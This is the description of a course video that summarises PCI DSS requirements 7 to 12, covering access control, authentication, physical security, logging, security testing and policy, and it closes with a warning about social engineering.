Video Description

This final video contains part 2 of the in-depth look at the PCI DSS requirements as well as a summary of the module. Requirements 7-12 consist of: - Restrict access to cardholder data. Implement principle of least privilege and need-to-know. Authentication using something I know, I have, and I am (biometrics). Utilize multi-factor authentication for extra strength. - Assign unique identifier to each person with computer access to the network. This allows for authentication and auditing. Passwords should be unreadable via one-way encryption. - Restrict physical access to cardholder data via physical controls. Maintain physical security policies, log visitors, use badges, implement a "clean desk" policy, and restrict media such as thumb drives that can cause data exfiltration. - Track and monitor access to network resources and cardholder data. Maintain an audit trail for all data access and secure logs to prevent modification. And most importantly, periodically review logs for suspicious behavior! - Regularly test security systems and processes. Perform internal and external penetration testing. Deploy file integrity checks to alert of unauthorized modification of critical system and other files. - Maintain a policy that addresses information security pertaining to both employees and contractors. The video concludes by pointing out the threats posed by social engineering. Humans are often the most vulnerable piece of an organization and they need to be educated about the risks they face. The overriding principle is: trust no one!

Course Modules